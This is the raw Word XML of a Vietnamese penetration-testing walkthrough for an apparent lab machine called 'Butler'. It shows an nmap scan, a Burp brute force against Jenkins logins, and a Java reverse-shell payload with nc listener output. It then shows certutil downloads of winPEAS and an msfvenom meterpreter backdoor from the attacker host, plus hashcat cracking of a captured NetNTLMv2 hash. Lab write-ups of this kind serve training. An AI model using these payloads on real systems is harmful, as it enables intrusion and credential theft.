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B423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Butler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PM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nmap -A -p- -T4 192.168.44.145          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7.91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2022-08-03 10:45 EDT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Nmap scan report for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>192.168.44.145 (192.168.44.145)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(0.00015s latency).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65523 closed ports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   STATE SERVICE       VERSION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135/tcp   open  msrpc      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139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn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445/tcp   ope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n  microsoft-ds?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5040/tcp  open  unknown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7680/tcp  open  pando-pub?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8080/tcp  open  http          Jetty 9.4.41.v20210516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http-robots.txt: 1 disallowed entry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|_/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Jetty(9.4.41.v20210516)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Site doesn't have a title (text/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>html;charset=utf-8).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49664/tcp open  msrpc      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49665/tcp open  msrpc      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49666/tcp open  msrpc      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49667/tcp open  msrpc      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49668/tcp open  msrpc      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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49669/tcp open  msrpc         Microsoft Windows RPC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OS: Windows; CPE: cpe:/o:microsoft:windows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script results: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|_clock-skew: 13h59m58s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|_nbstat: NetBIOS name: BUTLER, NetBIOS user: &lt;unknown&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, NetBIOS MAC: 00:0c:29:31:83:b8 (VMware)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smb2-security-mode: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2.02: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  Message signing enabled but not required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smb2-time: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date: 2022-08-04T04:49:38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start_date: N/A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detection performed. Please report any incorrect results at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 address (1 host up) scanned in 288.07 seconds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telnet nhưng không có gì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┌──(kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Calibri" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kali)-[~/Desktop]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└─$ telnet 192.168.44.145  7680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Trying 192.168.44.145...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 to 192.168.44.145.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Escape character is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'^]'.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quit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Connection closed by foreign host.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Vào trang ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ủ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> jenkins, đăng nh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p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tài kho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n m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c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nhưng không thành công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http://192.168.44.145:8080</w:t>
        </w:r>
      </w:hyperlink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Bruteforce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burpsuite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1438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t payload như sau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29225" cy="4429125"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="2" name="Picture 2" descr="Payload Sets &#10;You can define one or more payload sets. The number of payload sets depends on thk &#10;be customized in different ways. &#10;Payload set: &#10;Payload type: Simple list &#10;Payload Options [Simple listl &#10;Payload count: 4 &#10;Request count: 20 &#10;This payload type lets you configure a simple list of strings that are used as payloads. &#10;Paste &#10;Load &#10;Remove &#10;Clear &#10;Deduplicate &#10;Add &#10;Add from list . &#10;admin &#10;admin &#10;administrator &#10;jenkins &#10;Enter new i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load Sets &#10;You can define one or more payload sets. The number of payload sets depends on thk &#10;be customized in different ways. &#10;Payload set: &#10;Payload type: Simple list &#10;Payload Options [Simple listl &#10;Payload count: 4 &#10;Request count: 20 &#10;This payload type lets you configure a simple list of strings that are used as payloads. &#10;Paste &#10;Load &#10;Remove &#10;Clear &#10;Deduplicate &#10;Add &#10;Add from list . &#10;admin &#10;admin &#10;administrator &#10;jenkins &#10;Enter new ite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86500" cy="4572000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="Payload Sets &#10;You can define one or more payload sets. The number of payload sets depends on the attack type define( &#10;be customized in different ways. &#10;Payload set: 2 &#10;Payload type: Simple list &#10;Payload Options [Simple listl &#10;Payload count: 5 &#10;Request count: 20 &#10;This payload type lets you configure a simple list of strings that are used as payloads. &#10;Paste &#10;Load &#10;Remove &#10;Clear &#10;Deduplicate &#10;Add &#10;Add from list . &#10;password &#10;Password &#10;passwordl &#10;Passwordl &#10;jenkins &#10;Enter a new i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load Sets &#10;You can define one or more payload sets. The number of payload sets depends on the attack type define( &#10;be customized in different ways. &#10;Payload set: 2 &#10;Payload type: Simple list &#10;Payload Options [Simple listl &#10;Payload count: 5 &#10;Request count: 20 &#10;This payload type lets you configure a simple list of strings that are used as payloads. &#10;Paste &#10;Load &#10;Remove &#10;Clear &#10;Deduplicate &#10;Add &#10;Add from list . &#10;password &#10;Password &#10;passwordl &#10;Passwordl &#10;jenkins &#10;Enter a new item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 qu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 xml:space="preserve"> như sau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096375" cy="581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Đăng nh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p vào jenkins và l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y reverse s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hell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payload sau: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host="localhost";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port=8044;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cmd="cmd.exe";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Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()&gt;0)so.write(pi.read());while(pe.available()&gt;0)so.write(pe.r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ead());while(si.available()&gt;0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();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Trên máy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 b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t nc trư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c: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nc -nvlp 443               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listening on [any] 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>43 ...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 to [192.168.44.128] from (UNKNOWN) [192.168.44.145] 50064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 Windows [Version 10.0.19043.928]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(c) Microsoft Corporation. All rights reserved.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C:\Program Files\Jenkins&gt;whoami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whoami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butler\butler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C:\Program Files\Jenkins&gt;systeminfo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systeminfo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Name:                 BUTLER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Name:                   Microsoft Windows 10 Enterprise Evaluation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Version:                10.0.19043 N/A Build 19043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Manufacturer:           Microsoft Corporation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Configuration:          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Standalone Workstation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Build Type:             Multiprocessor Free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Registered Owner:          butler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Registered Organization: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 ID:                00329-20000-00001-AA079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Original Install Date:     8/14/2021, 3:51:38 AM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System Boot Time:       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   8/3/2022, 9:37:43 PM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Manufacturer:       VMware, Inc.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Model:              VMware7,1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Type:               x64-based PC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Processor(s):              3 Processor(s) Installed.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[01]: AMD64 Family 25 Model 80 Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ping 0 AuthenticAMD ~3194 Mhz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[02]: AMD64 Family 25 Model 80 Stepping 0 AuthenticAMD ~3194 Mhz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[03]: AMD64 Family 25 Model 80 Stepping 0 AuthenticAMD ~3194 Mhz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BIOS Version:              VMware, Inc. VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>W71.00V.18452719.B64.2108091906, 8/9/2021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Windows Directory:         C:\Windows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Directory:          C:\Windows\system32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Boot Device:               \Device\HarddiskVolume1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Locale:             en-us;English (United States)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Locale:        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">      en-us;English (United States)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Zone:                 (UTC-08:00) Pacific Time (US &amp; Canada)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Physical Memory:     4,095 MB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Available Physical Memory: 2,151 MB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Memory: Max Size:  5,503 MB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Memory: Available: 3,526 MB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Me</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mory: In Use:    1,977 MB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Page File Location(s):     C:\pagefile.sys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Domain:                    WORKGROUP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Logon Server:              N/A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Hotfix(s):                 6 Hotfix(s) Installed.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[01]: KB4601554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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  [02]: KB5013887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[03]: KB5000736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[04]: KB5015807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[05]: KB5014671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[06]: KB5001405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Card(s):           1 NIC(s) Installed.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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        [01]: Intel(R) 82574L Gigabit Network Connection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Connection Name: Ethernet0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DHCP Enabled:    Yes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DHCP Server:     192.168.44.254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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">             IP address(es)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[01]: 192.168.44.145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[02]: fe80::d84f:eb80:5807:1704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Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displaye</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d.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winpeas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C:\Program Files\Jenkins&gt; certutil -urlcache -f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http://192.168.44.128/winPEASx64.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> winpeas.exe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certutil -urlcache -f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http://1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>92.168.44.128/winPEASx64.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> winpeas.exe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  Online  ****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CertUtil: -URLCache command completed successfully.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y winpeas Thu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thông tin sau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butler::BUTLER:1122334455667788:1ac7ac3cb6c51764c9934d0d84f26279:0101000000000000d7d869814ca7d801d307dab2c5d47645000000000800300030000000000000000000000000300000ac6c3b895a9cb2e9e681a55396942e27f2f193caaa7caa1f0a48ca3d7000df420a00100000000000000000000000000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">000000000090000000000000000000000 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hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt    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backdoor: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msfvenom -p windows/x64/meterpreter/reverse_tcp  LHOST=192.168.44.128 LPORT=4445  -f exe &gt; wise.exe                    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[-] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No platform was selected, choosing Msf::Module::Platform::Windows from the payload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No arch selected, selecting arch: x64 from the payload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encoder specified, outputting raw payload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Payload size: 510 bytes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 size of exe file: 7168 bytes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i ba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ckdoor: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certutil -urlcache -f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http://192.168.44.128:81/wise.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> wise.exe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42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3F"/>
    <w:rsid w:val="00C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0BCFB-D06C-4D2F-842C-2874B222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44.128:81/wise.e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44.128/winPEASx64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44.145:8080" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.44.128/winPEASx64.exe" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/submi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nmap.or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2023-06-13T06:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-13T06:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>